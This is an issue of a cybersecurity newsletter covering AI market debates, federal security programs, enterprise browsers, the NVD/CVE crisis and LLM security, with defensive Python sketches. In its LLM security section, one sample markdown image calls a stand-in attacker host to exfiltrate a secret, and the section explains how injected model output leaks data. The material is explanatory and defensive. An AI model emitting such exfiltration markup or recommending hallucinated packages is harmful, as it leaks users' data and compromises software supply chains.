Resilient Cyber Newsletter #71

The Future of American Power, AI Bubble (Or Not?), Fortune Cyber 60, Enterprise Browsers, NVD/CVE Crisis & State of AI in Security & Development

Welcome!

Welcome to Issue #71 of the Resilient Cyber Newsletter.

We’re cruising along towards the holiday season, all while still in a U.S. Government shutdown.

In this issue, I share a wealth of great resources, including a deep discussion about the future of American power, competing debates about whether we’re in an AI bubble, the rise of Enterprise Browsers, and the continued impact of AI in Security and Development.

So, I hope you enjoy the discussions, resources, and analysis as much as I did!

Interested in sponsoring an issue of Resilient Cyber?

Sponsorship includes reaching over 40,000 subscribers, ranging from Developers, Engineers, and Architects to CISOs/Security Leaders and Business Executives.

Reach out below!

Examining AI’s Intersection with Trust 🔎

In my latest Resilient Cyber Deep Dive, I dig into Vanta’s 2025 “State of Trust” Report.

It discusses the leading risks that security leaders are facing, contrasting them with challenges such as stagnating budgets.

It also examines the rapid adoption of AI, despite a lack of AI governance, and how many teams continue to waste MONTHS a year on manual, legacy compliance processes compared to those using innovative platforms, such as Vanta, to move towards GRC Engineering.

Check out the full Deep Dive below!

Cyber Leadership & Market Dynamics

The Future of American Power

While not strictly focused on cyber, the conversation between Bari Weiss and Palmer Luckey of Anduril was one I found interesting due to its broad scope, encompassing technology, procurement, nation-state conflicts, innovation, AI, and more.

If you’re interested in these topics and have been paying attention to the U.S. national security and technology landscape, especially under the current administration, you will find this conversation as interesting as I did.

Is there an AI Bubble?

One question that has dominated conversations over the last several months is whether we’re in an AI bubble and what the implications would be if we are, with strong opinions on both sides of the debate.

I recently shared diagrams showing the outsized role AI has played in the U.S. GDP and growth in 2025, and we recently saw NVIDIA hit an insane $5 TRILLION market cap.

This conversation from the a16z podcast was one I found interesting, as the hosts debated the question and went on to argue that parallels between the current AI hype and prior technology waves, such as the early days of the Internet and the fiber buildout, are outright incorrect. One takeaway quote👇

“The year 2000 was defined by ‘dark fiber,’ where a staggering 97% of laid fiber optic cable sat unused, a monument to speculative overbuilding. Today, however, there are ‘no dark GPUs.’”

Building Tomorrow’s Transformational Companies - Sequoia Launches New Seed and Venture Fund

One of the industry’s largest VC firms, Sequoia, announced its latest venture fund focusing on seed and early-stage founders. They shared insights from their team, including key themes and focus areas, and while I won’t list them all, some jump out as relevant to Cyber and adjacent industries:

- Infra under AI

- Security and observability

- Network security

- AI Workflows and data center security

- AI, Agents, and Automating Services/Labor





Fortune Announces Cyber 60

Fortune recently announced their “Cyber 60”, which is described below:

“For the third annual Cyber 60 list, Fortune, Lightspeed Venture Partners, and AWS take a look at the most innovative startups creating the tools to meet these threats head on and keep businesses safe.”

The list features some amazing teams, many of which I’ve been lucky enough to collaborate with, including Endor Labs, where I serve as the Chief Security Advisor; Astrix and Prophet, which I work with as an advisor; and others I’ve gotten to work with via Resilient Cyber, such as Chainguard, Vanta, and Zafran.

It’s a testament to the amazing teams and momentum these organizations and leaders have built.

Inside FedRAMP 20x: GSA’s Pete Waterman Talks Speed, Safety & Automation

I recently participated in an episode of Resilient Cyber, where I delved into FedRAMP and FedRAMP 20x, and also attended a webinar with Chainguard, exploring the same topics from multiple angles. That’s why I thought it would be timely to share a recent interview from GovCast with the FedRAMP Director Pete Waterman, who discusses all things FedRAMP 20x.

From Chaos to Capability: Building the U.S. Market for Offensive Cyber

A key question is whether the U.S. government outsources its cyberattacks, and as it turns out, it already does. Much of what gets discussed in the cybersecurity ecosystem focuses on defense and defenders. Rightly so, as organizations struggle with everything from mounting vulnerability backlogs to supply chain incidents and even nation-state attacks.

This is a fascinating paper by Winnona DeSombre and Sergey Bratus from Dartmouth College, examining how the private sector currently operates in U.S. offensive cyber and how it could, or should, evolve in the future. It is also an output of an on-site roundtable hosted by Dartmouth’s Institute for Security, Technology and Society (ISTS). The authors identified three key findings in U.S. offensive cyber:

- Cyberspace dominance now requires both high and low equity capabilities, and opportunistic access at scale.

- The U.S. private sector (through government contractors, small companies, and individuals) already actively supports cyber operations on behalf of the U.S. government.

- Domestic private sector growth in offensive cyber tooling and access is currently limited by how offensive cyber is acquired.

It’s a really excellent look at the U.S. government’s current offensive cyber landscape, especially amid growing sentiment that the U.S. should take a more active role in offensive cyber, in a world where cyber is the fifth domain of warfare and several soft conflicts are already underway.

Cybersecurity is national security.



How Palo Alto and CyberArk Will Reshape The Future of Identity Security

Palo Alto Networks (PANW) made headlines this year with its massive identity-focused acquisition of CyberArk. But what are the implications of this acquisition, and how will it shape the future of identity security?

My friend Francis Odum dug into that topic in a recent piece he co-wrote with Jocelyn Lee on the Software Analyst Substack.

The piece dives into the combination of PANW and CyberArk and its implications for identity security, including the combined organization’s competitors, potential impacts on key identity security areas such as PAM and Secrets Management, and the integration into PANW’s security platform.

The Rise of the Enterprise Browser



People often confuse enterprise browsing with an Enterprise Browser. The truth is, they are not the same. The latter is a purpose-built platform with security as a foundation.

Enterprise users browsing the web, including untrusted sites, are at risk of clicking on malicious links, exposing sensitive organizational data, and other threats. At the same time, we’re entering a period where it isn’t just humans using browsers, but increasingly AI agents running autonomous, agentic workflows as well.

In my latest Resilient Cyber deep dive, I take a look at the rise of the enterprise browser, using Island as an example.

Enterprise browsers offer tremendous opportunities to consolidate complex and disjointed security technology stacks, providing potential to reduce both costs and organizational risks.

They also address key security use cases, including SaaS governance, BYOD, Zero Trust (ZT) network access, third-party relationships/supply chains, and developer endpoints, as well as the latest risk: the use of GenAI and LLMs.

I break down core enterprise browser use cases, industry attack trends, and the organizational value enterprise browser adoption offers.

Check out my full analysis below in my article titled “The Rise of the Enterprise Browser”.

AI

AI Double-Edged Sword

As we know, AI is a double-edged sword: it needs to be secured, and it also offers value for security. This interesting chart from Gartner shows the different niches, as well as how far out Gartner expects each one to be.

Why AI Isn’t Delivering ROI - And Three Fixes That Actually Work

Given recent stories of AI failing to deliver value, and of many organizations struggling with widespread adoption and ROI beyond pilots, this piece from my friend Steve Wilson was timely. Steve discusses how organizations should be building with AI, not just “adopting” it for the sake of adoption, to avoid being stuck in “pilot purgatory”.

He lays out three key points:

Horizontal AI: Easy to Deploy, Hard to Justify - Broad distribution of general-purpose AI tools that scale quickly and appeal to CIOs, but whose ROI is fuzzy. These rollouts need to be paired with adoption and accountability, tracking not just usage but where the tools are actually reducing time spent on repetitive tasks.

Vertical AI: Automating What Already Works - More targeted transformation, where organizations know how to measure impact with precise metrics. He recommends treating vertical AI projects like product launches, with KPIs identified upfront and well-bounded use cases.

AI-Native Product Teams: The Path With the Highest ROI and the Hardest Lift - He cites examples such as Cursor, where teams aren’t just adding AI to internal workflows but building it into their products, processes, and organizational design, which compounds efficiency at scale.



Federal Search Warrant for ChatGPT Prompts

In the first known federal search warrant in the U.S. compelling OpenAI to hand over prompt-level ChatGPT data, child-exploitation investigators within DHS are seeking two prompts submitted to ChatGPT by an anonymous user.

As Alan Robertson noted on LinkedIn, where I came across this news, this means prompts can be treated as evidence: they are not necessarily ephemeral or private entries in a chat session with an external AI service provider, and law enforcement can pursue them.

Practical LLM Security Advice from NVIDIA AI Red Team

I recently came across an excellent post from NVIDIA’s AI Red Team (AIRT) sharing practical recommendations around LLM security, including common vulnerabilities and security weaknesses that can be addressed to bolster LLM security.

They include:

- Vulnerability 1: Executing LLM-generated code can lead to remote code execution

- Vulnerability 2: Insecure access control in retrieval-augmented generation data sources

- Vulnerability 3: Active content rendering of LLM outputs

The article goes on to recommend mitigations for the risks discussed, making it a helpful read for anyone building systems that leverage LLMs.
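To make Vulnerability 3 concrete: when a chat UI renders LLM output as markdown, an injected image such as `![x](https://attacker.example/?q=<secret>)` is fetched automatically, which can leak data without any click. Below is a minimal Python sketch of one common mitigation, neutralizing images and non-allowlisted links before rendering. It is not NVIDIA's code; `ALLOWED_HOSTS` and `sanitize_llm_markdown` are hypothetical names, and a production system should prefer a real markdown parser and sanitizer over regular expressions.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: only these HTTPS hosts may remain as clickable links.
ALLOWED_HOSTS = {"docs.example.com"}

# Markdown image: ![alt](url "optional title")
IMAGE_RE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")
# Markdown link: [text](url "optional title")
LINK_RE = re.compile(r"\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def _host_allowed(url: str) -> bool:
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_HOSTS


def sanitize_llm_markdown(text: str) -> str:
    """Neutralize active content in LLM output before it is rendered."""
    # Renderers fetch images automatically, so an attacker-chosen URL can
    # exfiltrate data in its query string. Replace every image with its alt text.
    text = IMAGE_RE.sub(lambda m: m.group(1), text)

    # Links need a click, but still keep only allowlisted HTTPS destinations.
    def _replace_link(m: "re.Match[str]") -> str:
        label, url = m.group(1), m.group(2)
        return m.group(0) if _host_allowed(url) else f"{label} [link removed]"

    return LINK_RE.sub(_replace_link, text)
```

Images are dropped outright rather than allowlisted because their fetch happens without user interaction, which is exactly what makes them useful for exfiltration.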

AppSec

The NVD and CVE Crises Are Far From Over

While the headlines have calmed down a bit regarding the NVD’s ongoing backlog, the CVE program’s near collapse due to a looming funding lapse, and the quickly fracturing vulnerability ecosystem, things are far from solved.

In fact, one can argue, and this article does, that the CVE program’s future remains uncertain due to a variety of factors. The program’s current funding is set to end in March 2026. While some agencies, such as the Cybersecurity and Infrastructure Security Agency (CISA), are stepping up with a future vision and potential leadership for the program, many remain skeptical.

This is also leading to a rapid fracturing of the vulnerability database ecosystem, with alternatives such as the EUVD and GCVE emerging, inevitably making cyber defenders’ lives even more difficult as they juggle multiple disparate data sources.
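For defenders stitching these feeds together, one core chore is recognizing when records from different databases describe the same vulnerability. A minimal Python sketch, assuming each source's records have already been normalized into a common shape that lists the other IDs they reference (the `VulnRecord` type and every ID below are hypothetical), groups them with a union-find over shared identifiers:

```python
from dataclasses import dataclass, field


@dataclass
class VulnRecord:
    """Hypothetical normalized record; each real feed has its own schema."""
    source: str                                     # e.g. "NVD", "EUVD", "GCVE"
    record_id: str                                  # the source's own identifier
    aliases: set[str] = field(default_factory=set)  # other IDs the record references


def group_records(records: list[VulnRecord]) -> list[set[str]]:
    """Group identifiers that refer to the same vulnerability (union-find on aliases)."""
    parent: dict[str, str] = {}

    def find(x: str) -> str:
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving keeps trees shallow
            x = parent[x]
        return x

    def union(a: str, b: str) -> None:
        parent[find(a)] = find(b)

    for rec in records:
        find(rec.record_id)  # register IDs even when they have no aliases
        for alias in rec.aliases:
            union(rec.record_id, alias)

    groups: dict[str, set[str]] = {}
    for identifier in list(parent):
        groups.setdefault(find(identifier), set()).add(identifier)
    return list(groups.values())
```

Usage, with made-up identifiers: `group_records([VulnRecord("NVD", "CVE-2025-0001"), VulnRecord("EUVD", "EUVD-2025-0001", {"CVE-2025-0001"})])` places both IDs in a single group. Union-find is used because alias links are transitive: if A references B and C references B, all three end up together regardless of input order.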

It will be interesting to see what the future holds for NVD and CVE, as they have broad implications for every organization worldwide that performs vulnerability management.



SIEM Next-Gen 2.0

We see a lot of folks pursuing SIEM innovation, from adding AI-native capabilities to supporting practices such as Detection-as-Code, automation, and more. This piece from Andrew Green lays out a matrix of next-gen capabilities, ranging from legacy to what he calls “too-next gen”.

It covers both features and architectural differences among the vendors and their respective areas of focus.
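Detection-as-Code treats detection logic like software: rules live in version control, go through code review, and ship with tests. A minimal Python sketch of what such a rule can look like, assuming a hypothetical normalized `AuthEvent` schema and an arbitrary threshold (it is not tied to any vendor in Andrew Green's matrix):

```python
from dataclasses import dataclass
from typing import Iterable, Iterator


@dataclass(frozen=True)
class AuthEvent:
    """Hypothetical normalized authentication event from a log pipeline."""
    user: str
    source_ip: str
    success: bool


# Hypothetical threshold; in practice, tune it against your own baseline.
FAILED_LOGIN_THRESHOLD = 5


def detect_bruteforce(events: Iterable[AuthEvent]) -> Iterator[str]:
    """Yield one alert per (user, ip) pair whose consecutive failures hit the threshold."""
    failures: dict[tuple[str, str], int] = {}
    for event in events:
        key = (event.user, event.source_ip)
        if event.success:
            failures.pop(key, None)  # a successful login resets the streak
            continue
        failures[key] = failures.get(key, 0) + 1
        if failures[key] == FAILED_LOGIN_THRESHOLD:
            yield f"possible brute force: user={event.user} ip={event.source_ip}"
```

Because the rule is a plain function over events, it can be unit-tested in CI against sample logs before it ever reaches production.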

State of AI in Security & Development

If you’re like me, you’re a sucker for insightful reports and analysis. That’s why Aikido’s “State of AI in Security & Development” caught my attention.

It dives into the intersection of AI and AppSec, drawing insights from 450 security leaders around the globe. Among its findings, 1 in 5 had suffered a serious incident linked to AI-generated code.

There’s also a lot of confusion about who should actually be responsible for the security of AI-generated code, with some pointing at the security team, others pointing at developers, and some blaming vendors:



The developer tax from security continues, with 15% of engineering time lost to chasing down scanner alerts, false positives, and triage of findings, amounting to an insane $20 million per year for a 1,000-developer organization:


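Working backward from those two headline figures gives a rough sense of the cost assumption behind them. This is my own back-of-the-envelope arithmetic, not the report's stated methodology:

```latex
\begin{aligned}
\text{security toil per developer} &= \frac{\$20{,}000{,}000}{1{,}000} = \$20{,}000 \text{ per year} \\
\text{implied annual cost per developer} &= \frac{\$20{,}000}{0.15} \approx \$133{,}333
\end{aligned}
```

If the report assumed a different per-developer cost, the $20 million total would scale proportionally.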

Despite all the chants of “built in, not bolted on!”, security is still an afterthought or something that gets dismissed, with two-thirds of respondents stating they bypass security or dismiss findings and fixes.

This report is full of great insights, and I may do a standalone deep dive on it given how critical the topic of AI, Development and AppSec is in the current era of our industry.

Importing Phantoms: Measuring LLM Package Hallucination Vulnerabilities

It’s undeniable that LLMs have fundamentally changed, and will continue to change, what modern software development looks like, with rapid adoption, productivity gains, and an outsized share of modern code now written with their help.

We also know LLMs suffer from hallucinations.

Those hallucinations become an interesting and challenging aspect of software supply chain security when the LLMs are used for generating code. This paper presents valuable research on the role of LLMs and package hallucination behaviors, examining existing and fictional dependencies across various programming languages. They highlight:

How hallucinated package names get squatted by malicious actors to impact the broader software supply chain

Surprisingly, models that scored higher on coding benchmarks produced risky code less often, but “code models”, which were specifically trained to write code, produced risky code MORE often.

Some languages have higher rates of package hallucination, such as Rust and Python, and there are also methods you can use to mitigate hallucination.
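One common guardrail against hallucinated or squatted dependencies, sketched here in Python and not taken from the paper, is to flag any dependency an assistant adds that isn't on a vetted internal list before it gets installed. The `VETTED_PACKAGES` set and the sample package name are hypothetical; the name normalization follows PEP 503, and the parser only handles simple `requirements.txt` lines (no URLs or editable installs).

```python
import re
from typing import List, Optional

# Hypothetical internal allowlist of vetted dependencies (PEP 503-normalized names).
VETTED_PACKAGES = {"requests", "numpy", "pydantic"}


def normalize(name: str) -> str:
    """PEP 503 normalization: collapse runs of '-', '_' and '.' into '-', then lowercase."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_requirement_name(line: str) -> Optional[str]:
    """Extract the project name from a simple requirements.txt line."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("-"):
        return None  # blank line, comment, or pip option such as "-r other.txt"
    match = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
    return normalize(match.group(0)) if match else None


def unvetted_dependencies(requirements: str) -> List[str]:
    """Return normalized names that are not on the vetted list and need human review."""
    flagged = []
    for line in requirements.splitlines():
        name = parse_requirement_name(line)
        if name is not None and name not in VETTED_PACKAGES:
            flagged.append(name)
    return flagged
```

An allowlist is used rather than a simple "does this package exist on the registry?" check, because attackers register hallucinated names precisely so that they do exist.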

Very interesting times lie ahead, as developers continue to implicitly trust AI-generated code with little to no actual validation, and attackers are aware of this.